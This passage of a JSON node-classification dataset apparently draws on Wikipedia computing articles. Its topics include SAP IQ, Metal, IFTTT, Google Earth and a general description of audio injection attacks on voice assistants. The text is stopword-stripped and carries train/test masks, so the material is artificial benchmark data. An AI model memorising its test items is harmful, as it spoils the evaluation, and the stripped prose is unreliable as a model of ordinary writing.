unnested function r lexically scoped language unlike implementations values free variables determined set global variables r determined environment function created scoping environments may accessed using variety features codice_58 simulate experience dynamic scoping programmer desire block scoping functions access environment scope created variables created modified within function stay variables created modified within function stay unless assignment enclosing environment scope explicitly requested although r lexical scoping default function scopes changed",
    "neighbors": [
      512,
      10752,
      5635,
      11269,
      6664,
      2062,
      9231,
      6160,
      8221,
      9245,
      547,
      5677,
      2105,
      6717,
      8771,
      8773,
      8262,
      1610,
      9804,
      3675,
      5213,
      8289,
      8293,
      623,
      1152,
      8846,
      655,
      8854,
      5783,
      3736,
      4777,
      8874,
      5803,
      5806,
      2225,
      692,
      3765,
      7867,
      4799,
      6335,
      5833,
      8908,
      6349,
      8397,
      9932,
      7894,
      727,
      4823,
      7386,
      10463,
      7904,
      11488,
      4840,
      1769,
      3313,
      5361,
      256,
      2817,
      6919,
      5896,
      6414,
      10510,
      5395,
      1301,
      6933,
      10011,
      3869,
      10013,
      2335,
      3876,
      805,
      9008,
      10547,
      7479,
      3386,
      10043,
      1343,
      5961,
      8524,
      10581,
      10586,
      10075,
      11610,
      10083,
      6502,
      2936,
      386,
      3462,
      8582,
      7562,
      1931,
      8587,
      5521,
      3990,
      11674,
      1435,
      6558,
      6047,
      10145,
      1954,
      4516,
      7076,
      10148,
      5031,
      428,
      5040,
      8628,
      5048,
      10684,
      6594,
      963,
      5059,
      2501,
      4550,
      11212,
      11219,
      5588,
      6102,
      10198,
      10712,
      4057,
      3034,
      11226,
      4069,
      9701,
      6633,
      6640,
      1016,
      3577,
      2556,
      2045,
      5630
    ],
    "mask": "Test"
  },
  {
    "node_id": 10511,
    "label": 1,
    "text": "SAP_IQ:sap iq sap iq formerly known sap sybase iq sybase iq iq intelligent query column-based petabyte scale relational database software system used business intelligence data warehousing data marts produced sybase inc. sap company primary function analyze large amounts data low-cost highly available environment sap iq often credited pioneering commercialization column-store technology foundation sap iq lies column store technology allows speed compression ad-hoc analysis sap iq open interface approach towards ecosystem sap iq also integrated sap ’ business intelligence portfolio products form end-to-end business analytics software stack integral component sap in-memory data fabric architecture data management platform early 1990s waltham massachusetts-based expressway technologies inc. developed expressway 103 column-based engine optimized analytics would eventually become sybase iq sybase acquired expressway re-introduced product 1995 iq accelerator renamed shortly thereafter sybase iq giving version number 11.0 offering iq product part collection related technologies often found data warehouse including sybase adaptive server enterprise replication server powerdesigner powerdesigner sql anywhere sybase became one first mainstream companies acknowledge need specialized products data warehouse market version 12.0 sybase replaced loosely coupled query interface adaptive server enterprise tight coupling sql anywhere version 16 brings re-engineered column store extreme petabyte scale data volumes extreme data compression 2014 sap hana together partners bmmsoft hp intel netapp red hat announced world ’ largest data warehouse team engineers sap bmmsoft hp intel netapp red hat built data warehouse using sap hana sap iq 16 bmmsoft federated edmt running hp dl580 servers using intel xeon e7-4870 processors red hat enterprise linux 6 netapp fas6290 e5460 storage development testing 12.1pb data warehouse conducted sap/intel petascale lab santa clara calif. audited infosizing independent transaction processing council certified auditor release sp08 version numbers changed align match sap hana ’ version numbers reflect product ’ continuous integration sap hana actual release title sp03 follow-on sp02 covering platforms affected release sap ’ new approach streamlines simplifies data warehousing in-memory data fabric advent big data sap iq coupled sap hana deliver distributed in-memory analytics platform three main applications use cases try capitalize sap iq ’ strengths concerning scalability performance edw big data processor leveraging sap hana ’ in-memory speed operational reporting https //blogs.sap.com/2016/10/12/sap-nls-solution-sap-bw scenario sap enterprise resource planning erp data goes sap hana acts operational data store immediate analysis data analyzed integrated sap iq via near-line storage mechanisms described sap iq acts enterprise data warehouse receives data variety traditional sources oltp databases files systems sap hana operational data store ods https //blogs.sap.com/2019/05/22/q-the-easy-installer-for-sap-iq/ sap iq used edw also augmented hana ’ in-memory technology common uses include planning analysis reports simultaneous oltp processing needed case data flows sap iq sap hana sap businessobjects bi used achieve visibility across platforms user sap iq looks like relational dbms sql-based language layer accessible via odbc/jdbc drivers however inside sybase iq column-oriented dbms stores data tables sections columns data rather rows data like transactional databases column-orientation number advantages search done items matching particular value column data storage objects corresponding data column within table need accessed traditional row-based database would read whole table top bottom another advantage indexed correctly value would stored row data traditional database stored sap iq n-bitindex used access data nbit tiered indexing used allow increased compression fast incremental batch loads additionally column-based storage enables sap iq compress data efficiently fly prior sap iq 16 data page structured array cells fixed size values data type storage approach efficient structured fixed length data hold unstructured variable sized data seen today combat storage inefficiency store variable sized data minimal wasted space page composed cells variable size packed tightly together column store architecture supports variable number cells per page various page formats within column sap iq also applies lempel-ziv-welch lzw compression algorithms data page written disk significantly reduce data volume bitmaps used secondary indexes sap iq massively parallel processing mpp framework based shared-everything environment supports distributed query processing products capable mpp tend based shared-nothing environments benefit shared-everything flexible terms variety queries optimized—especially balancing needs many concurrent users downside extreme cases competition among processors access shared pool storage usually storage-area network lead i/o contention affects query performance 12 however aforementioned storage architecture sap iq allows compute storage layers scale independently also allows resources provisioned on-demand better utilization without restructuring underlying database sap iq uses clustered grid architecture made clusters sap iq servers multiplex clusters used scale performance large numbers concurrent queries queries great complexity built upon shared-everything architecture compute nodes interact shared storage queries ability distribute across compute nodes multiplex coordinator node manages database catalog coordinates transactional writes store nodes reader nodes readers writes like coordinator node storage fabric implemented numerous technologies allow sharing amongst multiplex nodes architecture multiple uses including workload balancing elastic virtual data marts workload balancing achieved sap iq query engine dynamically increasing/decreasing parallelism response changes server activity automatic failover node stops participating query nodes pick work originally assigned failed node query complete client side compatibility external load balances ensures queries initiated physical servers balanced fashion eliminate bottlenecks physical nodes multiplex grouped together “ logical servers ” allow workloads isolated security resource balancing purposes machines added demand changes aim grid architecture enable resiliency even global transactions sap iq loading engine used incremental batch low latency concurrent loading bulk loading client server data files bulk loading process allows multiple load process occur simultaneously loads different tables data loaded databases well files page-level snapshot versioning allows concurrent loads queries locking occurring table level sap replication server enhanced optimize loads sap iq transactions compiled fewest set operations bulk micro-batch loads sap iq performed gives appearance real-time continuous loads bulk loader performs operations parallel make full use server cores remove bottlenecks keep threads productive instead serializing process loading process remains two-phase process first reading raw data creating fp indexes second creating secondary indexes everything executed parallel high group indexes query optimizer relies information columns/rows contain data values structured set tiers increasing move pyramid lastly sap iq introduces write-optimized row level versioned rlv delta store enables high-velocity data loads fast availability data users store minimally indexes compressed row-level locking concurrent write transaction log append acts companion main store data loaded high speed rlv store migrating main store later merging periodically user appear though two separate entities work queries operate transparently across two stores make use users specify particular “ hot ” database tables rlv tables sap iq offers query apis based pure ansi sql standards restrictions include olap full-text search support stored procedures supported ansi sql transact-sql dialects executed scheduled immediate basis well database drivers variety programming languages java c/c++m php perl python ruby ado.net sap iq analytics engine query structured unstructured data join results together sap iq introduced new text index sql “ contains ” clause facilitate searching terms within blob unstructured text sap sybase ’ partnerships vendors allow various binary forms text files ingested sap iq text indexes created text indexes get data ready higher level text analysis applications perform full-text searches within sap iq via select statements select syntax used applications performing tokenization categorization text analysis in-database analytics built upon fundamental concept keeping analytics algorithms close data higher performance extensibility framework called “ in-database analytics ” enables embedding analytic functions inside database engine sap iq moving analytics database instead specialized environment database process error prone slower pre-built functions available natively via partners sap iq providing specialized statistical data mining libraries plug sap iq framework increases sap iq ’ power advance processing analysis data moved database specialized environment analytics data results obtained shared though dbms easily acquired sql interface user defined functions udfs partners extend dbms custom computations providing specialized statistical data mining libraries plug right sap iq enhance performance advanced processing analysis sap iq provides several features included base product licensable separately help protect security user ’ data new feature introduced iq 16 role based access control rbac enables separation duties upholds principle least privilege allowing breakdown privileged operations fine-grained sets individually granted users included part base product users groups permissions database administration authorities user login policies database encryption transport-layer security ipv6 role-based access control database auditing additional features part licensable option called advanced security option fips encryption kerberos authentication ldap authentication database column encryption part ilm sap iq allows users create multiple user dbspaces logical units storage/containers database objects organizing data used separate structured unstructured data group together according age value partition table data dbspaces also marked read-only enable one-time consistency checking back-up another application ilm ability partition tables place moving portions along storage fabric backup capabilities enables storage management process data cycles tiered storage moving faster expensive storage slower cheaper storage ages partitioning data according value multiplex set-up provides scalability high availability compute nodes multiplex coordinator node failover alternate coordinator node sap iq virtual backup also allows users quickly backup data along storage replication technology data continuously copied backups occur quickly “ behind scenes ” virtual backups completed verified test restore enterprise data copied development testing ’ left complete backup transactionally consistent point time sap claims disaster recovery easier shared everything approach mpp sap sybase powerdesigner modelling tool enables users build ilm model deployed sap iq storage types dbspaces lifecycle phases defined ilm model tool used generate reports create partition creation movement scripts sap iq provides federation hadoop distributed file system hdfs popular framework big data enterprise users continue store data hadoop utilize benefits integration achieved four different ways depending user ’ needs client-side federation etl data query federation client-side federation joins data iq hadoop client application level etl federation lets user load hadoop data column store schemas iq hdfs data also joined iq data fly sql queries iq finally results mapreduce jobs combined iq data also fly sap control center replaces sybase central web-based graphical tool administration monitoring sap control center used monitoring sap sybase servers resources node multiplex location well monitoring performance spotting usage trends web application multi-tiered plug-in architecture made server product-based agents bring sap sybase performance back control center server sap iq comes web-enabled application drivers facilitating access sap iq variety web 2.0 programming execution environments python perl php .net ruby query federation databases developers build applications interact multiple data sources time well database platforms vendors federation proxy tables map tables external databases created materialized in-memory tables interacted though resided within sap iq way data sources combined unified view sap iq also supports plugging external algorithms written c++ java sql queries call algorithms allowing execution in-database analytics provides better performance scalability additionally sybase iq also provides drivers access via languages php perl python ruby rails sap iq supports major operating system platforms including sybase claims sybase iq currently installed 2000 customer sites notable customers include comscore inc. corelogic investment technology group itg u.s. internal revenue service irs sybase iq widely used focused data-mart-style deployments also deployed enterprise data warehouse",
    "neighbors": [
      11136,
      3,
      8582,
      9353,
      6797,
      270,
      10511,
      9360,
      4116,
      1304,
      5677,
      10286,
      8644,
      9286,
      3791,
      10835,
      7767,
      5210,
      4058,
      8554,
      8188
    ],
    "mask": "Test"
  },
  {
    "node_id": 10512,
    "label": 2,
    "text": "Metal_(API):metal api metal low-level low-overhead hardware-accelerated 3d graphic compute shader application programming interface api developed apple inc. debuted ios 8 metal combines functions similar opengl opencl one api intended bring ios macos tvos apps performance benefits similar apis platforms vulkan debuted mid-february 2016 directx 12 metal object-oriented api invoked using swift objective-c programming languages full-blown control metal framework well related metalkit framework accessible via metal unified graphics compute language according apple promotional materials metal c++ based programming language developers use write code executed gpu graphics general-purpose data-parallel computations since metal based c++ developers find familiar easy use metal graphics compute programs written single unified language allows tighter integration two metal available since june 2 2014 ios devices powered apple a7 later since june 8 2015 macs 2012 models later running os x el capitan june 5 2017 wwdc apple announced second version metal supported macos high sierra ios 11 tvos 11 metal 2 separate api metal supported hardware metal 2 enables efficient profiling debugging xcode accelerated machine learning lower cpu workload support virtual reality macos specificities apple a11 gpu particular ios tvos metal supports apple-designed socs apple a7 newer macos metal supports intel hd iris graphics hd 4000 series newer amd gcn-based gpus nvidia kepler-based gpus newer metal designed around principles modern graphics compute apis vulkan direct3d 12 instructions sent gpu command buffers obtained command queues metal improves capabilities gpgpu programming using compute shaders metal uses specific shading language based c++14 implemented using clang llvm metal better performance opengl several reasons points reduce amount work cpu required successfully execute commands gpu lead overall performance gain cpu used compute tasks according apple 148,000 applications use metal directly 1.7 million use high-level frameworks june 2017 presumably applications games ios notable macos games using metal rendering listed",
    "neighbors": [
      10755,
      9732,
      4615,
      5647,
      7697,
      1042,
      11289,
      1057,
      6186,
      4139,
      6700,
      4657,
      1074,
      8754,
      9784,
      8253,
      8262,
      9802,
      8783,
      5713,
      4180,
      3670,
      1623,
      4184,
      3672,
      10838,
      2141,
      4702,
      3681,
      9826,
      2149,
      8806,
      8296,
      3691,
      8303,
      2673,
      6771,
      2676,
      7292,
      2686,
      6783,
      9343,
      10878,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      5784,
      1177,
      3228,
      2207,
      1699,
      11430,
      5292,
      8877,
      1710,
      2735,
      3248,
      3766,
      2232,
      9912,
      4283,
      3772,
      7869,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      3286,
      9430,
      3289,
      731,
      3293,
      4318,
      11487,
      6884,
      10470,
      231,
      9451,
      1772,
      10478,
      2288,
      7928,
      8441,
      7420,
      7422,
      11521,
      2819,
      1796,
      1290,
      3338,
      784,
      4888,
      5912,
      11037,
      10023,
      811,
      3371,
      4399,
      7983,
      10036,
      7991,
      9529,
      2363,
      2365,
      2366,
      9022,
      1346,
      8514,
      10562,
      4933,
      7496,
      9035,
      1878,
      4957,
      6495,
      9063,
      4457,
      3948,
      10608,
      11130,
      2943,
      2439,
      6023,
      6539,
      7052,
      9100,
      6032,
      9109,
      3483,
      1439,
      2979,
      8109,
      7086,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      6093,
      7118,
      464,
      8662,
      9174,
      10199,
      3035,
      4571,
      7133,
      3038,
      9182,
      4068,
      5093,
      9700,
      487,
      2023,
      10221,
      7154,
      5619,
      11257,
      7163
    ],
    "mask": "Train"
  },
  {
    "node_id": 10513,
    "label": 1,
    "text": "Australian_Plant_Name_Index:australian plant name index australian plant name index apni online database published names australian vascular plants covers names whether current names synonyms invalid names includes bibliographic typification details information australian plant census including distribution state links resources specimen collection maps plant photographs facility notes comments aspects originally brainchild nancy tyson burbidge began four-volume printed work consisting 3,055 pages containing 60,000 plant names compiled arthur chapman part australian biological resources study abrs 1991 made available online database handed australian national botanic gardens two years later responsibility maintenance given newly formed centre plant biodiversity research recognised australian herbaria authoritative source australian plant nomenclature core component australia virtual herbarium collaborative project 10 million funding aimed providing integrated online access data specimen collections australia major herbaria two query interfaces offered",
    "neighbors": [
      560,
      1227,
      6580,
      6571
    ],
    "mask": "Test"
  },
  {
    "node_id": 10514,
    "label": 9,
    "text": "Microsoft_Visual_Programming_Language:microsoft visual programming language microsoft visual programming language mvpl visual programming dataflow programming language developed microsoft microsoft robotics studio microsoft visual programming language distinguished microsoft programming languages visual basic c microsoft language true visual programming language microsoft utilized term visual previous programming products reflect large degree development languages performed dragging dropping traditional wysiwyg fashion",
    "neighbors": [
      2691
    ],
    "mask": "Test"
  },
  {
    "node_id": 10515,
    "label": 4,
    "text": "Audio_injection:audio injection audio injection exploitation digital assistants amazon echo google home apple siri unwanted instructions third party services lack authentication reacting user commands making possible attackers issue activation words commands trigger execution desired actions injection results include fraud burglary data espionage takeover connected systems digital assistants require activation word trigger complete recording audio analysis spoken commands e.g ok google commands spoken natural language processed executed activation word different manufacturer often connected product ’ name possible product owner customize activation word meaning models react word processed language analyzed regards voice recognition authorization individual users result users audible range device authorizations trigger execute actions depending functionality actions range simple actions like music playback controlling lights security critical sensitive actions opening gates executing ordering chargeable transactions reading private information audio injection attacks performed remotely access audible area digital assistant restricted attacked increasing distance transmission either reached overcoming existent acoustic barriers e.g via vending opening momentary opened window via unusual loud playback via amplifiers loudspeakers approach possible control digital assistants rooms floors outside building digital assistants distinguish whether voice commands directly spoken reproduced loudspeaker system means attacks performed via devices support audio playback via loudspeaker radio television used run mass-attacks telephones hands-free systems digital assistants systems text-to-speech-processing misused systems accessed randomly anonymously absence owner well activated remotely critical answering machines automated monitoring function playing message aloud along could used remote precise attacks june 2014 television commercial microsoft depicted actor issuing voice command xbox causing command interpreted xbox systems room television showing commercial december 2016 adam jakowenko showed one virtual assistant could activate another one using tts-processing january 2017 television news coverage child ordering dollhouse amazon alexa interface included news anchor jim patton quoting child quotation triggered orders dollhouses viewers coverage alexa devices running",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 10516,
    "label": 3,
    "text": "Mac_68k_emulator:mac 68k emulator mac 68k emulator software emulator built versions classic mac os powerpc emulator enabled running applications system code originally written 680x0-based macintosh models exceptions notably connectix ram doubler emulator ran software noticeable impact lower performance relative program compiled powerpc first version written gary davidian originally created use motorola 88000 cpu used apple abortive first attempt risc target platform later version using dynamic recompilation developed eric traut later worked successful emulation projects connectix virtual game station virtual pc prior traut arrival connectix released speed doubler included even faster powerpc 68k emulator versions emulator emulated user subset 68ec040 instruction set 68020/68030 exception stack frame apple developer documents indicate emulator provided operating environment closely resembling macintosh centris 610 system based motorola 68lc040 microprocessor early versions emulated decoding instruction immediately carrying series equivalent powerpc instructions pci powermacs dynamic recompilation emulator used boost performance dynamic recompilation works recompiling common sections code faster powerpc-native sequences locally cached emulator could recognise sequence 680x0 code run previously-cached powerpc code avoid translation emulator theoretically capable emulating 680x0 code faster real 680x0 capable running 68lc040 floating point instructions making feat slightly simpler less impressive one reason emulation successful many apis mac os originally implemented traps 680x0 processor therefore calling api actually recognised 680x0 equivalent error condition would cause handle error one hardware vectors turn vector would look run operating system routine rom ram emulator traps could replaced native powerpc code code emulated application system api called could accelerated native powerpc code also allowed apple time port os powerpc first time-critical aspects rewritten native code leaving much os emulated gradually os rewritten native os got faster time programmer transition powerpc made fairly painless emulator started stopped automatically achieved using new type pointer called universal procedure pointer upp 68k code pointer appeared ordinary pointer code could used however actually led data structure contained special trap instruction flags indicating instruction set architecture isa called code powerpc code upp could passed calluniversalproc function call 68k emulator dealt details presenting passed parameters right order isa question well starting stopping emulator required compilers mac os created upps automatically proper macros used powerpc system libraries contained native stubs transparently call native still-68k functions needed meant dealing dual architecture required little work programmer like os applications could mix match 680x0 powerpc code fairly easily built powerpc versions classic mac os emulator also part classic environment mac os x. powerpc macintosh emulators sheepshaver therefore use emulator well running classic mac os native mac os x outside classic never used emulator",
    "neighbors": [
      576,
      7941,
      6377,
      3371,
      9391,
      4112,
      8048,
      1042,
      499,
      5235,
      6130,
      8625,
      5976,
      8700,
      2653
    ],
    "mask": "Test"
  },
  {
    "node_id": 10517,
    "label": 8,
    "text": "IFTTT:ifttt also known ifttt free web-based service create chains simple conditional statements called applets applet triggered changes occur within web services gmail facebook telegram instagram pinterest example applet may send e-mail message user tweets using hashtag copy photo facebook user archive someone tags user photo addition web-based application service runs ios android february 2015 ifttt renamed original application released new suite apps called lets users create shortcut applications actions 2015 ifttt users created 20 million recipes day functionalities suite apps since integrated redesigned ifttt app december 14 2010 linden tibbets co-founder ifttt posted blog post titled “ ifttt beginning ... ” ifttt website announcing new project first ifttt applications designed developed tibbets co-founder jesse tane september 7 2011 tibbets announced launch official website april 30 2012 users created 1 million tasks june 2012 service entered internet things space integrating belkin wemo devices allowing applets interact physical world july 10 2013 ifttt released iphone app later released version ipad ipod touch april 24 2014 ifttt released version android end 2014 ifttt business valued approximately usd 170 million february 19 2015 ifttt launched three new applications button triggers action press camera automatically uploads image service choice facebook twitter dropbox etc. notes camera except notes instead images november 2016 four apps combined one december 2016 company announced partnership jotform integrate applet create actions applications part revenue ifttt comes ifttt platform partners pay products connected service among ge bmw microsoft google others dropbox new york times twitter slack spotify partners choose various monthly plans lite free use basic 199 enterprise 499 july 2019 ifttt announced tenfold increase monthly charges pricing smaller integration partners ifttt employs following concepts ifttt received positively forbes time wired new york times reader digest microsoft developed comparable product microsoft flow",
    "neighbors": [
      9796,
      10020,
      3692,
      7533,
      4623,
      4624,
      7983,
      1427,
      4888,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 10518,
    "label": 1,
    "text": "Database_server:database server database server server uses database application provides database services computer programs computers defined client–server model database management systems dbmss frequently provide database-server functionality database management systems mysql rely exclusively client–server model database access others e.g sqlite meant using embedded database users access database server either front end running user computerwhich displays requested dataor back end runs server handles tasks data analysis storage master-slave model database master servers central primary locations data database slave servers synchronized backups master acting proxies database applications respond query language database understands query language converts submitted query server-readable form executes retrieve results examples proprietary database applications include oracle db2 informix microsoft sql server examples free software database applications include postgresql gnu general public licence include ingres mysql every server uses query logic structure sql structured query language query language less relational database applications clarification database server simply server maintains services related clients via database applications db-engines lists 300 dbmss ranking foundations modeling large sets data first introduced charles bachman 1969 bachman introduced data structure diagrams dsds means graphically represent data dsds provided means represent relationships different data entities 1970 codd introduced concept users database ignorant inner workings database codd proposed relational view data later evolved relational model databases use today 1971 database task report group codasyl driving force behind development programming language cobol first proposed data description language describing database data description language describing part data base known program data manipulation language research development databases focused relational model 1970s 1975 bachman demonstrated relational model data structure set similar congruent ways structuring data working honeywell entity-relationship model first proposed current form peter chen 1976 conducting research mit model became frequently used model describe relational databases chen able propose model superior navigational model applicable real world relational model proposed codd",
    "neighbors": [
      2688,
      7175,
      9481,
      10505,
      1037,
      270,
      7310,
      9360,
      10258,
      4630,
      11030,
      4376,
      1049,
      9112,
      284,
      4255,
      7968,
      290,
      1314,
      7461,
      3366,
      4135,
      5287,
      8229,
      5546,
      8742,
      10921,
      10413,
      2222,
      5550,
      5808,
      10418,
      6451,
      9527,
      3768,
      3004,
      9661,
      1215,
      4416,
      2369,
      5441,
      6780,
      6850,
      9663,
      8518,
      9286,
      72,
      11457,
      853,
      2901,
      6359,
      9942,
      9177,
      8282,
      987,
      860,
      8539,
      9183,
      2786,
      11362,
      10340,
      3045,
      10471,
      5608,
      8808,
      7022,
      6383,
      9079,
      4725,
      1142,
      4598,
      2424,
      2681,
      9467,
      4604
    ],
    "mask": "Test"
  },
  {
    "node_id": 10519,
    "label": 0,
    "text": "Morphological_dictionary:morphological dictionary field computational linguistics morphological dictionary linguistic resource contains correspondences surface form lexical forms words surface forms words found text corresponding lexical form surface form lemma followed grammatical information example part speech gender number english give gives giving gave given surface forms verb give lexical form would give verb two kinds morphological dictionaries aligned non-aligned aligned morphological dictionary correspondence surface form lexical form word aligned character level example θ empty symbol signifies noun signifies plural example left hand side surface form input right hand side lexical form output order used morphological analysis lexical form generated surface form morphological generation order would reversed formally σ alphabet input symbols formula_1 alphabet output symbols aligned morphological dictionary subset formula_2 alphabet possible alignments including empty symbol aligned morphological dictionary set string formula_4 non-aligned morphological dictionary simply set formula_5 pairs input output strings non-aligned morphological dictionary would represent previous example possible convert non-aligned dictionary aligned dictionary besides trivial alignments left right linguistically motivated alignments align characters corresponding morphemes possible frequently exists one lexical form associated surface form word example house may noun singular may verb present tense result necessary function relates input strings corresponding output strings define set formula_6 input words formula_7 correspondence function would formula_8 defined formula_9",
    "neighbors": [
      1890,
      7839
    ],
    "mask": "Test"
  },
  {
    "node_id": 10520,
    "label": 8,
    "text": "UWSGI:uwsgi uwsgi software application aims developing full stack building hosting services named web server gateway interface wsgi first plugin supported project uwsgi often used serving python web applications conjunction web servers cherokee nginx offer direct support uwsgi native uwsgi protocol",
    "neighbors": [
      225,
      865,
      3237,
      4485,
      6664,
      8554,
      5612,
      7983,
      11221,
      119,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10521,
    "label": 5,
    "text": "Wireless_Communications_Transfer_Protocol:wireless communications transfer protocol wireless communications transfer protocol wctp method used send messages wireless devices pagers npcs narrowband pcs networks uses http transport layer world wide web development wctp initiated messaging standards committee submitted radio paging community first proposal received sub-committee established improve protocol issue specification sub-committee moved ptc paging technical committee volunteer committee composed industry representatives pcia personal communications industry accepted first full release adopted protocol pcia standard current version wctp 1.3",
    "neighbors": [
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 10522,
    "label": 7,
    "text": "Peer-to-peer_web_hosting:peer-to-peer web hosting peer-to-peer web hosting using peer-to-peer networking distribute access webpages differentiated client–server model involves distribution web data dedicated web servers user-end client computers p2p web hosting may take form p2p web caches content delivery networks like dijjer coral cache allow users hold copies data single web pages distribute caches users faster access peak traffic",
    "neighbors": [
      10368,
      4229,
      4490,
      11029,
      3350,
      5026,
      6435,
      6565,
      3366,
      5158,
      2222,
      3770,
      1087,
      8640,
      11073,
      708,
      6351,
      3792,
      6991,
      7761,
      5078,
      11097,
      3676,
      5085,
      225,
      4194,
      3428,
      3813,
      7921,
      1908,
      4725,
      5749,
      9332
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10523,
    "label": 7,
    "text": "BlackSpider_Technologies_Limited:blackspider technologies limited blackspider technologies limited british software company founded 2002 subsequently acquired surfcontrol july 2006 company provided cloud computing services filtering email spam malware blackspider start-up company founded 2002 john cheney reading berkshire uk january 2004 casenove private equity invested £4.6m 6.6m business allowing organisation grow french german markets july 2006 surfcontrol uk listed plc acquired blackspider £19.5m cash point acquisition blackspider £4m historic revenues operating loss £3.1m 1,200 customers october 2007 websense acquired surfcontrol approximately £204m following acquisition surfcontrol websense original blackspider management team including john cheney left found workbooks.com provider web-based crm software small businesses mailcontrol brand name blackspider technologies email filtering services products sold forcepoint brand name hosted email security",
    "neighbors": [
      4194,
      7515,
      10772
    ],
    "mask": "Test"
  },
  {
    "node_id": 10524,
    "label": 5,
    "text": "Software_Communications_Architecture:software communications architecture software communications architecture sca open architecture framework defines standard way radios instantiate configure manage waveform applications running platform sca separates waveform software underlying hardware platform facilitating waveform software portability re-use avoid costs redeveloping waveforms latest version sca 4.1 sca published joint tactical networking center jtnc architecture developed assist development software defined radio sdr communication systems capturing benefits recent technology advances expected greatly enhance interoperability communication systems reduce development deployment costs architecture also applicable embedded distributed-computing applications communications terminals electronic warfare ew sca structured sca deliberately designed meet commercial application requirements well military applications since sca intended become self-sustaining standard wide cross-section industry invited participate development validation sca sca system specification implementation independent set rules constrain design systems achieve objectives listed core framework cf defines essential core set open software interfaces profiles provide deployment management interconnection intercommunication software application components embedded distributed-computing communication system sense interfaces defined sca part cf standard waveform apis define key software interfaces allow waveform application radio platform interact sca use apis separate waveform software underlying hardware platform facilitating waveform software portability re-use avoid costs redeveloping waveforms",
    "neighbors": [
      6419
    ],
    "mask": "Test"
  },
  {
    "node_id": 10525,
    "label": 5,
    "text": "Google_Earth:google earth google earth computer program renders 3d representation earth based primarily satellite imagery program maps earth superimposing satellite images aerial photography gis data onto 3d globe allowing users see cities landscapes various angles users explore globe entering addresses coordinates using keyboard mouse program also downloaded smartphone tablet using touch screen stylus navigate users may use program add data using keyhole markup language upload various sources forums blogs google earth able show various kinds images overlaid surface earth also web map service client addition earth navigation google earth provides series tools desktop application additional globes moon mars available well tool viewing night sky flight simulator game also included features allow users view photos various places uploaded panoramio information provided wikipedia locations street view imagery web-based version google earth also includes voyager feature periodically adds in-program tours often presented scientists documentarians google earth viewed threat privacy national security leading program banned multiple countries countries requested certain areas obscured google satellite images usually areas containing military facilities core technology behind google earth originally developed intrinsic graphics late 1990s time company developing 3d gaming software libraries demo 3d software created spinning globe could zoomed similar powers ten film demo popular board intrinsic wanted remain focused gaming 1999 created keyhole inc. headed john hanke keyhole developed way stream large databases mapping data internet client software key part technology acquired patchworks mapping data governments sources product called keyhole earthviewer sold cds use fields real estate urban planning defense intelligence users paid yearly fee service despite making number capital deals nvidia sony small company struggling make payroll employees leaving fortunes company changed early 2003 cnn received discount software exchange placing keyhole logo on-air whenever map used keyhole expect would amount brief 5 10 second prerecorded animation clips used extensively miles o'brien live 2003 invasion iraq allowing cnn millions viewers follow progress war way never seen public interest software exploded keyhole servers able keep demand keyhole soon contacted central intelligence agency venture capital firm in-q-tel national geospatial-intelligence agency use defense mapping databases gave keyhole much-needed cash infusion intrinsic graphics sold 2003 vicarious visions gaming libraries sell well core group engineers management transitioned keyhole hanke remaining head time google finding 25 searches geospatial character including searches maps directions october 2004 google acquired keyhole part strategy better serve users google earth imagery displayed digital globe displays planet surface using single composited image far distance zooming far enough imagery transitions different imagery area finer detail varies date time one area next imagery retrieved satellites aircraft launch nasa usgs landsat 8 satellite google relied partially imagery landsat 7 suffered hardware malfunction left diagonal gaps images 2013 google used datamining remedy issue providing described successor blue marble image earth single large image entire planet achieved combining multiple sets imagery taken landsat 7 eliminate clouds diagonal gaps creating single mosaic image google uses landsat 8 provide imagery higher quality greater frequency imagery hosted google servers contacted application opened requiring internet connection imagery resolution ranges 15 meters resolution 15 centimeters much earth google earth uses digital elevation model data collected nasa shuttle radar topography mission creates impression three-dimensional terrain even imagery two-dimensional every image created google earth using satellite data provided google earth copyrighted map derivative google earth made copyrighted data united states copyright law may used except licenses google provides google allows non-commercial personal use images e.g personal website blog long copyrights attributions preserved contrast images created nasa globe software world wind use blue marble landsat usgs imagery public domain version 5.0 google introduced historical imagery allowing users view earlier imagery clicking clock icon toolbar opens time slider marks time available imagery past feature allows observation area changes time utilizing timelapse feature allows ability view zoomable video far back 32 years google earth shows 3d building models cities including photorealistic 3d imagery first 3d buildings google earth created using 3d modeling applications sketchup beginning 2009 building maker uploaded google earth via 3d warehouse june 2012 google announced would replacing user-generated 3d buildings auto-generated 3d mesh would phased starting select larger cities notable exception cities london toronto required time process detailed imagery vast number buildings reason given greater uniformity 3d buildings compete nokia apple maps already using technology coverage began year 21 cities four countries early 2016 3d imagery expanded hundreds cities 40 countries including every u.s. state encompassing every continent except antarctica 2009 collaboration google museo del prado madrid museum selected 14 paintings photographed displayed resolution 14,000 megapixels inside 3d version prado google earth google maps april 15 2008 version 4.3 google fully integrated street view google earth street view displays 360° panoramic street-level photos select cities surroundings photos taken cameras mounted automobiles viewed different scales many angles navigable arrow icons imposed introduced google earth 5.0 2009 google ocean feature allows users zoom surface ocean view 3d bathymetry supporting 20 content layers contains information leading scientists oceanographers april 14 2009 google added bathymetric data great lakes june 2011 google increased resolution deep ocean floor areas 1-kilometer grids 100 meters high-resolution features developed oceanographers columbia university lamont-doherty earth observatory scientific data collected research cruises sharper focus available 5 percent oceans seen hudson new york city wini seamount near hawaii mendocino ridge u.s pacific coast google programs features including within google earth allowing exploration mars moon view sky earth outer space including surfaces various objects solar system google sky feature introduced google earth 4.2 august 22 2007 browser-based application march 13 2008 android smartphones augmented reality features google sky allows users view stars celestial bodies produced google partnership space telescope science institute stsci baltimore science operations center hubble space telescope dr. alberto conti co-developer dr. carol christian stsci plan add public images 2007 well color images archived data hubble advanced camera surveys newly released hubble pictures added google sky program soon issued new features multi-wavelength data positions major satellites orbits well educational resources provided google earth community also christian conti website sky also visible sky mode constellations stars galaxies animations depicting planets orbits real-time google sky mashup recent astronomical transients using voevent protocol provided voeventnet collaboration programs similar google sky include microsoft worldwide telescope stellarium google mars application within google earth version program imagery planet mars google also operates browser-based version although maps much higher resolution within google earth include 3d terrain well infrared imagery elevation data also extremely-high-resolution images mars reconnaissance orbiter hirise camera similar resolution cities 